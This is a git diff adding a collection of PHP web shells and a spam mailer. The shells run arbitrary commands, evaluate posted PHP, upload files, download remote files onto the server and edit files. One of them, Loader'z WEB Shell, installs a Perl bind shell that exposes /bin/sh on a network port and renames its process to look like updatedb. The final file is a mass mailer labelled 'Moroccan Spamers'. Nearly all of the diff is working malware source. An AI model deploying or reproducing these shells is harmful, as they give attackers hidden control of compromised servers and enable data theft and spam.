+            case 'createdir':
+            if(mkdir($_GET['crdir']))
+            {
+            print 'Directory created successfully.';
+            }
+            else
+            {
+            print 'Couldn\'t create directory';
+            }
+            break;
+            
+            
+            case 'phpinfo': //PHP Info
+                phpinfo();
+            break;
+            
+            
+            case 'rename':
+            
+                if(isset($_POST['fileold']))
+                {
+                    if(rename($_POST['fileold'],$_POST['filenew']))
+                    {
+                        print "File renamed.";
+                    }
+                    else
+                    {
+                        print "Couldn't rename file.";
+                    }
+                    
+                }
+                if(isset($_GET['file']))
+                {
+                    $file = basename(htmlspecialchars($_GET['file']));
+                }
+                else
+                {
+                    $file = "";
+                }
+                
+                print "Renaming ".$file." in folder ".realpath('.').".<br>
+                                <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
+                    <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
+                    <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
+                    <input type=submit value=\"Rename file\">
+                    </form>";
+            break;
+            
+            case 'md5':
+            if(isset($_POST['md5']))
+            {
+            if(!is_numeric($_POST['timelimit']))
+            {
+            $_POST['timelimit'] = 30;
+            }
+            set_time_limit($_POST['timelimit']);
+                if(strlen($_POST['md5']) == 32)
+                {
+                    
+                        if($_POST['chars'] == "9999")
+                        {
+                        $i = 0;
+                        while($_POST['md5'] != md5($i) && $i != 100000)
+                            {
+                                $i++;
+                            }
+                        }
+                        else
+                        {
+                            for($i = "a"; $i != "zzzzz"; $i++)
+                            {
+                                if(md5($i == $_POST['md5']))
+                                {
+                                    break;
+                                }
+                            }
+                        }
+
+                    
+                    if(md5($i) == $_POST['md5'])
+                    {
+                            print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
+                    }
+                    
+                }
+                
+            }
+            
+            print "Will bruteforce the md5
+                <form action=\"".$me."?p=md5\" method=POST>
+                <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
+                <b>Characters:</b><br><select name=\"chars\">
+                <option value=\"az\">a - zzzzz</option>
+                <option value=\"9999\">1 - 9999999</option>
+                </select>
+                <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
+                <input type=submit value=\"Bruteforce md5\">
+                </form><br>*: if set_time_limit is allowed by php.ini";
+            break;
+            
+            case 'headers':
+            foreach(getallheaders() as $header => $value)
+            {
+            print htmlspecialchars($header . ":" . $value)."<br>";
+            
+            }
+            break;
+        }
+
+}
+else //Default page that will be shown when the page isn't found or no page is selected.
+{
+    
+    $files = array();
+    $directories = array();
+    
+    if(isset($_FILES['uploadedfile']['name']))
+{
+    $target_path = realpath('.').'/';
+    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
+
+    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
+        print "File:".  basename( $_FILES['uploadedfile']['name']). 
+        " has been uploaded";
+    } else{
+        echo "File upload failed!";
+    }
+}
+
+
+    
+    
+    
+    print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
+    if ($handle = opendir('.'))
+    {
+        while (false !== ($file = readdir($handle))) 
+        {
+              if(is_dir($file))
+              {
+                $directories[] = $file;
+              }
+              else
+              {
+                $files[] = $file;
+              }
+        }
+    asort($directories);
+    asort($files);
+        foreach($directories as $file)
+        {
+            print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
+        }
+        
+        foreach($files as $file)
+        {
+            print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
+        }
+    }
+    else
+    {
+        print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
+    }
+    
+    print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
+<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
+<input type=\"submit\" value=\"Upload File\" />
+</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
+<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
+</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
+</table>";
+
+
+}
+
+
+function login()
+{
+    print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
+    <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
+    <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
+    </form>";
+}
+function reload()
+{
+    header("Location: ".basename(__FILE__));
+}
+
+function get_execution_method()
+{
+    if(function_exists('passthru')){ $m = "passthru"; }
+    if(function_exists('exec')){ $m = "exec"; }
+    if(function_exists('shell_exec')){ $m = "shell_ exec"; }
+    if(function_exists('system')){ $m = "system"; }
+    if(!isset($m)) //No method found :-|
+    {
+        $m = "Disabled";
+    }
+    return($m);
+}
+
+function execute_command($method,$command)
+{
+    if($method == "passthru")
+    {
+        passthru($command);
+    }
+    
+    elseif($method == "exec")
+    {
+        exec($command,$result);
+        foreach($result as $output)
+        {
+            print $output."<br>";
+        }
+    }
+    
+    elseif($method == "shell_exec")
+    {
+        print shell_exec($command);
+    }
+    
+    elseif($method == "system")
+    {
+        system($command);
+    }
+
+}
+
+function perm($file)
+{
+    if(file_exists($file))
+    {
+        return substr(sprintf('%o', fileperms($file)), -4);
+    }
+    else
+    {
+        return "????";
+    }
+}
+
+function get_color($file)
+{
+if(is_writable($file)) { return "green";}
+if(!is_writable($file) && is_readable($file)) { return "white";}
+if(!is_writable($file) && !is_readable($file)) { return "red";}
+
+
+
+}
+
+function show_dirs($where)
+{
+    if(ereg("^c:",realpath($where)))
+    {
+    $dirparts = explode('\\',realpath($where));
+    }
+    else
+    {
+    $dirparts = explode('/',realpath($where));
+    }
+    
+    
+    
+    $i = 0;
+    $total = "";
+    
+    foreach($dirparts as $part)
+    {
+        $p = 0;
+        $pre = "";
+        while($p != $i)
+        {
+            $pre .= $dirparts[$p]."/";
+            $p++;
+            
+        }
+        $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
+        $i++;
+    }
+    
+    return "<h2>".$total."</h2><br>";
+
+}
+print $footer;
+
+// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
+exit();
+?>
diff --git a/xakep-shells/PHP/lamashell.php.txt b/xakep-shells/PHP/lamashell.php.txt
new file mode 100644
index 0000000..1df8222
--- /dev/null
+++ b/xakep-shells/PHP/lamashell.php.txt
@@ -0,0 +1,89 @@
+<?
+if($_POST['dir'] == "") {
+
+ $curdir = `pwd`;
+} else {
+ $curdir = $_POST['dir'];
+}
+
+if($_POST['king'] == "") {
+
+ $curcmd = "ls -lah";
+} else {
+ $curcmd = $_POST['king'];
+}
+
+
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
+                        "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+  <head>
+    <title>lama's'hell v. 3.0</title>
+    <style type="text/css">
+     body {
+      color: white; background-color: black;
+      font-size: 12px;
+      font-family: Helvetica,Arial,Sans-Serif;
+     }
+    </style>
+  </head>
+  <body>
+    <pre>
+                              _           _
+                             / \_______ /|_\
+                            /          /_/ \__
+                           /             \_/ /
+                         _|_              |/|_
+                         _|_  O    _    O  _|_
+                         _|_      (_)      _|_
+                          \                 /
+                           _\_____________/_
+                          /  \/  (___)  \/  \
+                          \__(  o     o  )__/ <?
+$ob = @ini_get("open_basedir");
+$df = @ini_get("disable_functions");
+if( ini_get('safe_mode') ) {
+   echo "SM: 1 \\ ";
+} else {
+   echo "SM: 0 \\ ";
+}
+if(''==$df) {
+   echo "DF: 0 \\ ";
+} else {
+   echo "DF: ".$df." \\ ";
+}
+echo "".php_uname()."\n";
+?>
+<hr></pre>
+    <table><form method="post" enctype="multipart/form-data">
+      <tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<? echo $curcmd; ?>"></td>
+      <tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<? echo $curdir; ?>"></td>
+      <td><input name="exe" type="submit" value="Execute"></td></tr>
+
+      <tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td>
+      <td><input name="upl" type="submit" value="Upload"></td></tr>
+    </form></table>
+<pre><hr>
+<?
+    if(($_POST['upl']) == "Upload" ) {
+    if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) {
+        echo "The file has been uploaded<br><br>";
+    } else {
+        echo "There was an error uploading the file, please try again!";
+    }
+    }
+    if(($_POST['exe']) == "Execute") {
+     $curcmd = "cd ".$curdir.";".$curcmd;
+     $f=popen($curcmd,"r");
+     while (!feof($f)) {
+      $buffer = fgets($f, 4096);
+      $string .= $buffer;
+     }
+     pclose($f);
+     echo htmlspecialchars($string);
+    }
+?>
+    </pre>
+  </body>
+</html>
diff --git a/xakep-shells/PHP/load_shell.php.php.txt b/xakep-shells/PHP/load_shell.php.php.txt
new file mode 100644
index 0000000..86bdcc8
--- /dev/null
+++ b/xakep-shells/PHP/load_shell.php.php.txt
@@ -0,0 +1,513 @@
+<?
+error_reporting(0);
+/* Loader'z WEB Shell v 0.1.0.2 {15 ������� 2005}
+��� ����� �� ������������ �������.
+- ������ � �������� �������� � ������� PHP. � ������� ������� ������������ ���������� ������� ���� (���������� � ���� ������, ���������� ��� ����, � �� ����� :)).
+- ���������� ����, ��� ����� ;)
+- �������� ��� register_globals=off
+- ����� �������� ������ � ���� ����
+- �������� � �������������� ������.
+- ������� ������ � ������� ������� � ������� ������� PHP.
+- ������� ������ � ������ �������� �����.
+- ���������� ������������ ������ �� �������.
+- ������ ������ �������� ��������� ����������. �������� �� ������� ������� �� ���� ���, ���� ��, �� ������ ������� ���������� �������,
+��� ��������, � ��� �� ����, ��� �� ������ ��������� �������.
+- ������ ������� �������� �� ����������� ���� �������.
+- ���� ������ �������� ��� ����������� �� Windows, ������ ���������� ��� ���������� ������ �������������� � win-1251.
+- ������������ ����������� ������ ����-����. �� ������ ������� �������� ��������� � ���� �� ������� ��������� ������.
+Loader Pro-Hack.ru
+*/
+?>
+
+<style type='text/css'>
+html { overflow-x: auto }
+BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #000000 }
+TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #0000000 }
+BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
+A:link {COLOR: #666666; TEXT-DECORATION: none}
+A:active {	COLOR: #666666; TEXT-DECORATION: none;}
+A:visited {COLOR: #666666; TEXT-DECORATION: none;}
+A:hover {COLOR: #999999; TEXT-DECORATION: none;}
+BODY {
+	SCROLLBAR-FACE-COLOR: #cccccc;
+	SCROLLBAR-HIGHLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-SHADOW-COLOR: #CBAB78;
+	SCROLLBAR-3DLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-ARROW-COLOR: #000000;
+	SCROLLBAR-TRACK-COLOR: #000000;
+	SCROLLBAR-DARKSHADOW-COLOR: #CBAB78}
+
+
+
+
+fieldset.search { padding: 6px; line-height: 150% }
+
+label { cursor: pointer }
+
+form { display: inline }
+
+img { vertical-align: middle; border: 0px }
+
+img.attach { padding: 2px; border: 2px outset #000033 }
+
+#tb { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
+#logo { FONT-SIZE: 50px; }
+input { width: 80; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+#input2 { width: 150; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+
+
+</style>
+
+<script>
+function tag(thetag) {document.fe.editfile.value=thetag;}
+</script>
+
+
+<title>Loader'z WEB shell</title>
+
+<table height=100% "width="100%">
+<tr><td align="center" valign="top">
+
+
+<table><tr><td>
+<?php
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+    
+    
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+/*����������*/
+
+/*���������� ��� �������*/
+$servsoft = $_SERVER['SERVER_SOFTWARE'];
+
+if (ereg("Win32", $servsoft, $reg)){
+$sertype = "winda";
+}
+else
+{
+$sertype = "other";}
+
+
+
+echo $servsoft . "<br>";
+chdir($dir);
+echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";
+
+
+
+
+
+if (ini_get('safe_mode') <> 1){
+if ($sertype == "winda"){
+
+ob_start('decode');
+echo "OS: ";
+echo execute("ver") . "<br>";
+ob_end_flush();
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "uname:" . execute('uname -a') . "<br>";
+}}
+else{
+if ($sertype == "winda"){
+
+echo "OS: " . php_uname() . "<br>";
+
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "OS:" . php_uname() . "<br>";
+}
+}
+
+echo 'User: ' .get_current_user() . '<br>';
+
+
+
+if (ini_get("open_basedir")){
+echo "open_basedir: " . ini_get("open_basedir");}
+
+
+if (ini_get('safe_mode') == 1){
+echo "<font size=\"3\"color=\"#cc0000\">Safe mode :(";
+
+if (ini_get('safe_mode_include_dir')){
+echo "Including from here: " . ini_get('safe_mode_include_dir'); }
+if (ini_get('safe_mode_exec_dir')){
+echo " Exec here: " . ini_get('safe_mode_exec_dir');
+}
+echo "</font>";}
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "<center><div id=logostrip>Download - OK. (".$sizef."��)</div></center>";
+}
+else
+{
+print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "&lt;" , $string);
+$string = str_replace(">" , "&gt;" , $string);
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
+<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
+<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>Successfully saved!</div></center>";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "<center><div id=logostrip>PHP code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
+<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "<center><div id=logostrip>Results of PHP execution<br><br>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</div></center>";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "<td>Yes</td>";}
+else{
+$file = $file . "<td>No</td>";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "<td>Yes</td></td></tr>";}
+else{
+$file = $file . "<td>No</td></td></tr>";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+
+
+
+
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table id=tb><tr><td>Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
+
+
+<table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
+
+echo getcwd();
+echo "\">
+<INPUT type=\"submit\" value=\"Do it\" id=input></td></tr></table></form>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>Download here <b>from</b>:
+<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
+<b>into:</b>
+<INPUT type=\"text\" name=\"fileto\" size=30>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
+<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+
+<table id=tb><tr><td>
+Download from Hard:<INPUT type=\"file\" name=\"userfile\" id=input2>
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+</td><td><INPUT type=\"submit\" value=\"Download\" id=input></form></div></td></tr></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>Install bind
+<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"></td><td>
+<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\" maxlength=5 size=4></td><td>
+
+<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Install\" id=input></form></div></td></table>";
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" name=fe>
+<table id=tb><tr><td>File to edit:
+<input type=\"text\" name=\"editfile\" ></td><td>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\" id=input></form></div></td></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>
+<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
+<INPUT type=\"submit\" value=\"PHP code\" id=input></form></div></td></table>";
+?>
+</td></tr></table>
+
+
+</td></tr>
+<tr valign="BOTTOM">
+<td valign=bottom>
+
+
+<center>Coded by Loader <a href="http://pro-hack.ru">Pro-Hack.RU</a></center>
+
+
+</td>
+</tr>
+</table>
+
diff --git a/xakep-shells/PHP/mailer3.php.php.txt b/xakep-shells/PHP/mailer3.php.php.txt
new file mode 100644
index 0000000..2865e14
--- /dev/null
+++ b/xakep-shells/PHP/mailer3.php.php.txt
@@ -0,0 +1,182 @@
+<? 
+if ($action=="send"){ 
+$message = urlencode($message); 
+$message = ereg_replace("%5C%22", "%22", $message); 
+$message = urldecode($message); 
+$message = stripslashes($message); 
+$subject = stripslashes($subject); 
+} 
+
+?> 
+<form name="form1" method="post" action="" enctype="multipart/form-data"> 
+<div align="center"> 
+<center> 
+<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1"> 
+<tr> 
+<td width="100%"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2"> 
+<tr> 
+<td width="100%"> 
+<p align="center"><div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277"> 
+<tr> 
+<td width="100%" height="272"> 
+<table width="769" border="0" height="303"> 
+<tr> 
+<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28"> 
+<p align="center"><b><font face="Tahoma" size="2" color="#FF6600">  Moroccan Spamers Ma-EditioN By GhOsT </font></b></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Email:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Name:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="text" name="realname" value="<? print $realname; ?>" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach 
+File:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="file" name="file" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div> 
+</td> 
+<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="subject" value="<? print $subject; ?>" size="59" style="float: left"> 
+</font></td> 
+</tr> 
+<tr valign="top"> 
+<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top"> 
+<div align="left"> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4"> 
+<tr> 
+<td width="100%"> 
+<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea> 
+<br> 
+<input type="radio" name="contenttype" value="plain" checked> 
+<font size="2" face="Tahoma">Plain</font> 
+<input type="radio" name="contenttype" value="html"> 
+<font size="2" face="Tahoma">HTML</font> 
+<input type="hidden" name="action" value="send"> 
+<input type="submit" value="Send Message"> 
+</td> 
+</tr> 
+</table> 
+</div> 
+</td> 
+<td width="317" bgcolor="#CCCCCC" height="187" valign="top"> 
+<div align="center"> 
+<center> 
